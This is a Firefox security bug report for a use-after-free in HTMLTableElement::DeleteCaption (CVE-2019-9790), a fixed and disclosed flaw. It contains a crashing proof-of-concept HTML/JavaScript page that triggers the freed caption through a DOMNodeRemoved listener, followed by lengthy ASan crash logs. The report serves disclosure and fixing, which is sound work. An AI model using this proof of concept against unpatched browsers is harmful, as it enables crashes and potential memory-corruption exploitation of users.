Closed Bug 1525145 (CVE-2019-9790) Opened 6 years ago Closed 6 years ago

Use After Free In HTMLTableElment::DeleteCaption

Categories

(Core :: DOM: Core & HTML, defect, P1)

Tracking

VERIFIED FIXED
mozilla67
Tracking Status
firefox-esr60 66+ verified
firefox65 --- wontfix
firefox66 + verified
firefox67 + verified

People

(Reporter: wieser.brandon, Assigned: smaug)

Details

(Keywords: csectype-uaf, reporter-external, sec-critical, Whiteboard: [reporter-external] [client-bounty-form] [verif?][post-critsmash-triage][adv-main66+][adv-esr60.6+])

Attachments

(3 files)

Attached file crash.html

I found a use after free by code review and have written a crashing proof of concept. Also there are at least two other use after frees in the same class. The problem is that a raw pointer to a caption element is obtained. It's then passed to RemoveChild(), which dispatches a sync DOMNodeRemoved event. I've attached a simple proof of concept. Wait for the page to load and then mouse over the table. Click the alert box and Firefox should crash. This looks like pretty old code, so I bet most versions of Firefox are affected. Also there are at least two other use after frees in that file. I'll open up separate bug reports for those. It could be modified so you don't have to mouse over the table and click the alert box to trigger the bug, but I've worked so long and hard to try and find a bug and I finally found one, so I'm reporting it ASAP! In order to fix this issue I would recommend taking a strong reference to the caption object so it can't be removed.

HTMLTableElement::DeleteCaption()
{
  HTMLTableCaptionElement* caption = GetCaption();
  if (caption) {
    mozilla::ErrorResult rv;
    nsINode::RemoveChild(*caption, rv);
    MOZ_ASSERT(!rv.Failed());
  }
}

Flags: sec-bounty?

I can't reproduce a crash with the testcase (tested on 66 beta, mac).

What version of Firefox are you testing on? Can you link to a submitted crash report for the crash?

Group: firefox-core-security → dom-core-security
Component: Security → DOM: Core & HTML
Flags: needinfo?(wieser.brandon)
Product: Firefox → Core

(In reply to :Gijs (he/him) from comment #1)

I can't reproduce a crash with the testcase (tested on 66 beta, mac).

What version of Firefox are you testing on? Can you link to a submitted crash report for the crash?

I was using an optimized plus debug build on Linux. I think Firefox 63? The code looks the same for Firefox 66. Hopefully I didn't jump the gun and report something that isn't an issue again... I'll download the latest Firefox and see if I can't get it to crash.

Flags: needinfo?(wieser.brandon)

Yup, just confirmed it crashes the latest Nightly ASan build on Linux. Make sure you're running an HTTP server, so for example python -m SimpleHTTPServer 8080. Then download the latest ASan build on Linux and browse to http://127.0.0.1:8080/crash.html, wait a few seconds for the ASan browser to load the page, then mouse over the table. Wait for the alert box to pop up and then click OK.

Actually, now that I figured out how to read AddressSanitizer's output, I don't think this is a use after free. Looks like a safe assertion failure. Sorry everyone, looks like I jumped the gun again...

(In reply to Brandon Wieser from comment #4)

Actually, now that I figured out how to read AddressSanitizer's output

Can you paste the output as a comment? Thank you!

Flags: needinfo?(wieser.brandon)

Based on code inspection this looks like a valid issue and a regression from bug 824907.

Assignee: nobody → bugs

simplified crashing PoC:

<html>
<head>
<script>
function boom()
{
  var table = document.createElement("TABLE");
  var caption = document.createElement("CAPTION");
  table.appendChild(caption);

  table.addEventListener("DOMNodeRemoved", function()
  {
    table.removeEventListener("DOMNodeRemoved", arguments.callee, false);
    table.removeChild(caption);
    caption = null;
    for(var x = 0; x < 0x10; x++)
    {
      var g = new ArrayBuffer(0x1000000);
    }
    document.location.href='https://google.com';
    alert();
  }, false);
  table.deleteCaption();
}
</script>

</head>
<body onload="boom();">
<h1 style="color:green;">welcome</h1>
</body>
</html>

ASAN Log:
Assertion failure: !rv.Failed(), at /builds/worker/workspace/build/src/dom/html/HTMLTableElement.cpp:651
#01: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x8a60b51]
#02: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x8ba5778]
#03: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe26a3d6]
#04: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe269978]
#05: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe26b429]
#06: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe26015e]
#07: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe24942a]
#08: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe2699ac]
#09: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe26b429]
#10: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe26b64f]
#11: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xed7bccb]
#12: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x865c1e4]
#13: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x9285935]
#14: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x9284107]
#15: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x925d667]
#16: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x925e9f7]
#17: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x924f09b]
#18: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x924e243]
#19: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x92512ae]
#20: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xb0aab6f]
#21: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xd807450]
#22: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xd804bfc]
#23: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xd808f30]
#24: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x608117d]
#25: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x60806ba]
#26: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x607de89]
#27: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x607f7a3]
#28: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x608020d]
#29: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x47d9b8e]
#30: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x7018d6b]
#31: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x6ffdd57]
#32: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x6ffd1f2]
#33: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x70a91d6]
#34: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x457411a]
#35: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x45b2496]
#36: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x45b8f6d]
#37: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x5369ef6]
#38: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x52991ad]
#39: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x5299021]
#40: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xabd567b]
#41: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe052605]
#42: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x536abca]
#43: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x52991ad]
#44: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x5299021]
#45: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe051c69]
#46: ???[/home/sequel/Desktop/firefoxaddressan/firefox +0x10ec08]
#47: ???[/home/sequel/Desktop/firefoxaddressan/firefox +0x10ee8f]
#48: __libc_start_main[/lib/x86_64-linux-gnu/libc.so.6 +0x2409b]
#49: ???[/home/sequel/Desktop/firefoxaddressan/firefox +0x34a05]
==32570==WARNING: ASan is ignoring requested __asan_handle_no_return: stack top: 0x7ffe292e8000; bottom 0x7fb2e12e2000; size: 0x004b48006000 (323330531328)
False positive error reports may follow
For details see https://github.com/google/sanitizers/issues/189

Program /home/sequel/Desktop/firefoxaddressan/firefox (pid = 32570) received signal 11.
Stack:
#01: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xf9dc4fb]
#02: ???[/lib/x86_64-linux-gnu/libpthread.so.0 +0x12dd0]
#03: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x951c6fe]
#04: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x8a60b51]
#05: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x8ba5778]
#06: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe26a3d6]
#07: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe269978]
#08: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe26b429]
#09: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe26015e]
#10: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe24942a]
#11: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe2699ac]
#12: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe26b429]
#13: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe26b64f]
#14: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xed7bccb]
#15: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x865c1e4]
#16: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x9285935]
#17: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x9284107]
#18: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x925d667]
#19: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x925e9f7]
#20: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x924f09b]
#21: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x924e243]
#22: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x92512ae]
#23: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xb0aab6f]
#24: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xd807450]
#25: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xd804bfc]
#26: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xd808f30]
#27: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x608117d]
#28: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x60806ba]
#29: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x607de89]
#30: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x607f7a3]
#31: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x608020d]
#32: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x47d9b8e]
#33: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x7018d6b]
#34: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x6ffdd57]
#35: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x6ffd1f2]
#36: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x70a91d6]
#37: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x457411a]
#38: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x45b2496]
#39: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x45b8f6d]
#40: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x5369ef6]
#41: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x52991ad]
#42: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x5299021]
#43: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xabd567b]
#44: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe052605]
#45: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x536abca]
#46: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x52991ad]
#47: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x5299021]
#48: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe051c69]
#49: ???[/home/sequel/Desktop/firefoxaddressan/firefox +0x10ec08]
#50: ???[/home/sequel/Desktop/firefoxaddressan/firefox +0x10ee8f]
#51: __libc_start_main[/lib/x86_64-linux-gnu/libc.so.6 +0x2409b]
#52: ???[/home/sequel/Desktop/firefoxaddressan/firefox +0x34a05]
Sleeping for 300 seconds.
Type 'gdb /home/sequel/Desktop/firefoxaddressan/firefox 32570' to attach your debugger to this thread.

###!!! [Parent][MessageChannel] Error: (msgtype=0x1E0070,name=PBrowser::Msg_SynthMouseMoveEvent) Channel error: cannot send/recv

[Parent 32513, Main Thread] WARNING: SendSynthMouseMoveEvent() failed: 'ret', file /builds/worker/workspace/build/src/dom/ipc/TabParent.cpp, line 1084

###!!! [Parent][MessageChannel] Error: (msgtype=0x1E0070,name=PBrowser::Msg_SynthMouseMoveEvent) Channel error: cannot send/recv

[Parent 32513, Main Thread] WARNING: SendSynthMouseMoveEvent() failed: 'ret', file /builds/worker/workspace/build/src/dom/ipc/TabParent.cpp, line 1084

###!!! [Parent][MessageChannel] Error: (msgtype=0x1E0087,name=PBrowser::Msg_Destroy) Channel error: cannot send/recv

++DOCSHELL 0x619000faf580 == 10 [pid = 32513] [id = {4533dd08-8a0e-4512-ae93-48e7169f89c7}]
++DOMWINDOW == 20 (0x61600032d980) [pid = 32513] [serial = 25] [outer = (nil)]
++DOMWINDOW == 21 (0x619000322380) [pid = 32513] [serial = 26] [outer = 0x61600032d980]
++DOMWINDOW == 22 (0x6190009ffb80) [pid = 32513] [serial = 27] [outer = 0x61600032d980]
++DOMWINDOW == 23 (0x619001142280) [pid = 32513] [serial = 28] [outer = 0x616000328580]
++DOCSHELL 0x61900035ca80 == 11 [pid = 32513] [id = {289c3ea8-5dab-4f92-b0f6-557250b4dd23}]
++DOMWINDOW == 24 (0x616000035180) [pid = 32513] [serial = 29] [outer = (nil)]
++DOMWINDOW == 25 (0x619000137980) [pid = 32513] [serial = 30] [outer = 0x616000035180]
++DOMWINDOW == 26 (0x6190001f5e80) [pid = 32513] [serial = 31] [outer = 0x616000035180]
++DOCSHELL 0x619000ffa080 == 12 [pid = 32513] [id = {7f9a80a5-cfe2-4cbf-97bc-e1ea9bdccafa}]
++DOMWINDOW == 27 (0x616000267380) [pid = 32513] [serial = 32] [outer = (nil)]
++DOMWINDOW == 28 (0x619001205c80) [pid = 32513] [serial = 33] [outer = 0x616000267380]
[Parent 32513, StreamTrans #53] WARNING: 'NS_FAILED(rv)', file /builds/worker/workspace/build/src/xpcom/base/MemoryTelemetry.cpp, line 304
[Parent 32513, StreamTrans #53] WARNING: 'NS_FAILED(rv)', file /builds/worker/workspace/build/src/xpcom/base/MemoryTelemetry.cpp, line 308
[Parent 32513, StreamTrans #53] WARNING: 'NS_FAILED(rv)', file /builds/worker/workspace/build/src/xpcom/base/MemoryTelemetry.cpp, line 310
--DOCSHELL 0x6190001b7b80 == 11 [pid = 32513] [id = {0fdd9f0c-212c-4a38-8c7e-a06d560b0db1}]
--DOCSHELL 0x619000fda780 == 10 [pid = 32513] [id = {9001855b-00c7-45f3-8952-2fa884d98d89}]
--DOMWINDOW == 27 (0x6160002e0b80) [pid = 32513] [serial = 21] [outer = (nil)] [url = chrome://devtools/content/inspector/markup/markup.xhtml]
--DOMWINDOW == 26 (0x61600021ba80) [pid = 32513] [serial = 17] [outer = (nil)] [url = about:blank]
--DOMWINDOW == 25 (0x619000dd3180) [pid = 32513] [serial = 18] [outer = (nil)] [url = about:blank]
--DOMWINDOW == 24 (0x6190003a6180) [pid = 32513] [serial = 22] [outer = (nil)] [url = chrome://devtools/content/inspector/markup/markup.xhtml]
++DOCSHELL 0x6190006ddd80 == 1 [pid = 32614] [id = {34f3fe68-af12-442a-95a5-22781e35ee02}]
++DOMWINDOW == 1 (0x61600009a280) [pid = 32614] [serial = 1] [outer = (nil)]
++DOMWINDOW == 2 (0x619000737d80) [pid = 32614] [serial = 2] [outer = 0x61600009a280]
[Parent 32513, Main Thread] WARNING: 'NS_FAILED(rv)', file /builds/worker/workspace/build/src/netwerk/url-classifier/UrlClassifierCommon.cpp, line 122
++DOMWINDOW == 25 (0x6190007bc580) [pid = 32513] [serial = 34] [outer = 0x616000035180]
++DOMWINDOW == 3 (0x61900074ef80) [pid = 32614] [serial = 3] [outer = 0x61600009a280]
[Child 32614, Main Thread] WARNING: 'NS_FAILED(rv)', file /builds/worker/workspace/build/src/xpcom/base/MemoryTelemetry.cpp, line 280
[Child 32614, StreamTrans #3] WARNING: 'NS_FAILED(rv)', file /builds/worker/workspace/build/src/xpcom/base/MemoryTelemetry.cpp, line 304
[Child 32614, StreamTrans #3] WARNING: 'NS_FAILED(rv)', file /builds/worker/workspace/build/src/xpcom/base/MemoryTelemetry.cpp, line 308
[Child 32614, StreamTrans #3] WARNING: 'NS_FAILED(rv)', file /builds/worker/workspace/build/src/xpcom/base/MemoryTelemetry.cpp, line 310
Assertion failure: !rv.Failed(), at /builds/worker/workspace/build/src/dom/html/HTMLTableElement.cpp:651
#01: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x8a60b51]
#02: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x8ba5778]
#03: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe26a3d6]
#04: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe269978]
#05: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe26b429]
#06: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe26015e]
#07: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe24942a]
#08: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe2699ac]
#09: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe26b429]
#10: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe26b64f]
#11: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xed7bccb]
#12: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x865c1e4]
#13: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x9285935]
#14: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x9284107]
#15: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x925d667]
#16: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x925e9f7]
#17: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x924f09b]
#18: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x924e243]
#19: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x92512ae]
#20: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xb0aab6f]
#21: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xd807450]
#22: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xd804bfc]
#23: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xd808f30]
#24: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x608117d]
#25: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x60806ba]
#26: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x607de89]
#27: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x607f7a3]
#28: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x608020d]
#29: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x47d9b8e]
#30: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x7018d6b]
#31: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x6ffdd57]
#32: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x6ffd1f2]
#33: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x70a91d6]
#34: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x457411a]
#35: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x45b2496]
#36: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x45b8f6d]
#37: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x5369ef6]
#38: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x52991ad]
#39: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x5299021]
#40: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xabd567b]
#41: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe052605]
#42: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x536abca]
#43: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x52991ad]
#44: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x5299021]
#45: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe051c69]
#46: ???[/home/sequel/Desktop/firefoxaddressan/firefox +0x10ec08]
#47: ???[/home/sequel/Desktop/firefoxaddressan/firefox +0x10ee8f]
#48: __libc_start_main[/lib/x86_64-linux-gnu/libc.so.6 +0x2409b]
#49: ???[/home/sequel/Desktop/firefoxaddressan/firefox +0x34a05]
==32614==WARNING: ASan is ignoring requested __asan_handle_no_return: stack top: 0x7ffc10aa2000; bottom 0x7f99a8156000; size: 0x00626894c000 (422661373952)
False positive error reports may follow
For details see https://github.com/google/sanitizers/issues/189

Program /home/sequel/Desktop/firefoxaddressan/firefox (pid = 32614) received signal 11.
Stack:
#01: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xf9dc4fb]
#02: ???[/lib/x86_64-linux-gnu/libpthread.so.0 +0x12dd0]
#03: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x951c6fe]
#04: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x8a60b51]
#05: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x8ba5778]
#06: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe26a3d6]
#07: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe269978]
#08: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe26b429]
#09: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe26015e]
#10: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe24942a]
#11: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe2699ac]
#12: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe26b429]
#13: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe26b64f]
#14: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xed7bccb]
#15: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x865c1e4]
#16: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x9285935]
#17: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x9284107]
#18: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x925d667]
#19: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x925e9f7]
#20: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x924f09b]
#21: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x924e243]
#22: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x92512ae]
#23: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xb0aab6f]
#24: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xd807450]
#25: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xd804bfc]
#26: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xd808f30]
#27: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x608117d]
#28: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x60806ba]
#29: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x607de89]
#30: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x607f7a3]
#31: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x608020d]
#32: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x47d9b8e]
#33: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x7018d6b]
#34: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x6ffdd57]
#35: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x6ffd1f2]
#36: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x70a91d6]
#37: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x457411a]
#38: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x45b2496]
#39: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x45b8f6d]
#40: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x5369ef6]
#41: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x52991ad]
#42: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x5299021]
#43: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xabd567b]
#44: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe052605]
#45: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x536abca]
#46: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x52991ad]
#47: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x5299021]
#48: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe051c69]
#49: ???[/home/sequel/Desktop/firefoxaddressan/firefox +0x10ec08]
#50: ???[/home/sequel/Desktop/firefoxaddressan/firefox +0x10ee8f]
#51: __libc_start_main[/lib/x86_64-linux-gnu/libc.so.6 +0x2409b]
#52: ???[/home/sequel/Desktop/firefoxaddressan/firefox +0x34a05]
Sleeping for 300 seconds.
Type 'gdb /home/sequel/Desktop/firefoxaddressan/firefox 32614' to attach your debugger to this thread.

###!!! [Parent][MessageChannel] Error: (msgtype=0x1E0072,name=PBrowser::Msg_RealMouseButtonEvent) Channel error: cannot send/recv

[Parent 32513, Main Thread] WARNING: SendRealMouseButtonEvent() failed: 'ret', file /builds/worker/workspace/build/src/dom/ipc/TabParent.cpp, line 1101

###!!! [Parent][MessageChannel] Error: (msgtype=0x1E0070,name=PBrowser::Msg_SynthMouseMoveEvent) Channel error: cannot send/recv

[Parent 32513, Main Thread] WARNING: SendSynthMouseMoveEvent() failed: 'ret', file /builds/worker/workspace/build/src/dom/ipc/TabParent.cpp, line 1084
++DOCSHELL 0x6190001b7b80 == 11 [pid = 32513] [id = {2feeaa8a-988f-4cc7-ad1b-f7e24e4841a6}]
++DOMWINDOW == 26 (0x616000171f80) [pid = 32513] [serial = 35] [outer = (nil)]
++DOMWINDOW == 27 (0x61900031e280) [pid = 32513] [serial = 36] [outer = 0x616000171f80]

###!!! [Parent][MessageChannel] Error: (msgtype=0x1E0068,name=PBrowser::Msg_UpdateDimensions) Channel error: cannot send/recv

###!!! [Parent][MessageChannel] Error: (msgtype=0x1E0070,name=PBrowser::Msg_SynthMouseMoveEvent) Channel error: cannot send/recv

[Parent 32513, Main Thread] WARNING: SendSynthMouseMoveEvent() failed: 'ret', file /builds/worker/workspace/build/src/dom/ipc/TabParent.cpp, line 1084

###!!! [Parent][RunMessage] Error: Channel error: cannot send/recv

###!!! [Parent][MessageChannel] Error: (msgtype=0x35001F,name=PContent::Msg_NotifyVisited) Channel error: cannot send/recv

###!!! [Parent][MessageChannel] Error: (msgtype=0x520016,name=PHttpChannel::Msg_Redirect3Complete) Channel error: cannot send/recv

###!!! [Parent][MessageChannel] Error: (msgtype=0x52001A,name=PHttpChannel::Msg_DeleteSelf) Channel error: cannot send/recv

###!!! [Parent][RunMessage] Error: Channel error: cannot send/recv

###!!! [Parent][RunMessage] Error: Channel error: cannot send/recv

###!!! [Parent][MessageChannel] Error: (msgtype=0x1E0087,name=PBrowser::Msg_Destroy) Channel error: cannot send/recv

++DOCSHELL 0x619000ecf480 == 12 [pid = 32513] [id = {dc30e74f-6ba0-477d-8fd2-9b57a8192dd5}]
++DOMWINDOW == 28 (0x6160003ca280) [pid = 32513] [serial = 37] [outer = (nil)]
++DOMWINDOW == 29 (0x61900084a880) [pid = 32513] [serial = 38] [outer = 0x6160003ca280]
++DOMWINDOW == 30 (0x619000cd8280) [pid = 32513] [serial = 39] [outer = 0x6160003ca280]
++DOMWINDOW == 31 (0x6190005cf380) [pid = 32513] [serial = 40] [outer = 0x616000171f80]
console.error: "Exception while opening the toolbox" "Protocol error (noSuchActor): No such actor for ID: server1.conn2.child1/frameTarget1" "Protocol error (noSuchActor): No such actor for ID: server1.conn2.child1/frameTarget1"
undefined
[Parent 32513, StreamTrans #55] WARNING: 'NS_FAILED(rv)', file /builds/worker/workspace/build/src/xpcom/base/MemoryTelemetry.cpp, line 304
[Parent 32513, StreamTrans #55] WARNING: 'NS_FAILED(rv)', file /builds/worker/workspace/build/src/xpcom/base/MemoryTelemetry.cpp, line 308
[Parent 32513, StreamTrans #55] WARNING: 'NS_FAILED(rv)', file /builds/worker/workspace/build/src/xpcom/base/MemoryTelemetry.cpp, line 310
Couldn't convert chrome URL: chrome://branding/locale/brand.properties
--DOMWINDOW == 30 (0x619000322380) [pid = 32513] [serial = 26] [outer = (nil)] [url = about:blank]
--DOCSHELL 0x61900035ca80 == 11 [pid = 32513] [id = {289c3ea8-5dab-4f92-b0f6-557250b4dd23}]
--DOCSHELL 0x619000ffa080 == 10 [pid = 32513] [id = {7f9a80a5-cfe2-4cbf-97bc-e1ea9bdccafa}]
--DOMWINDOW == 29 (0x61600032d980) [pid = 32513] [serial = 25] [outer = (nil)] [url = about:tabcrashed?e=tabcrashed&u=http%3A//127.0.0.1%3A8080/crash.html&c=UTF-8&f=regular&d=%20]
--DOCSHELL 0x619000faf580 == 9 [pid = 32513] [id = {4533dd08-8a0e-4512-ae93-48e7169f89c7}]
--DOMWINDOW == 28 (0x616000267380) [pid = 32513] [serial = 32] [outer = (nil)] [url = chrome://devtools/content/webconsole/index.html]
--DOMWINDOW == 27 (0x616000035180) [pid = 32513] [serial = 29] [outer = (nil)] [url = about:blank]
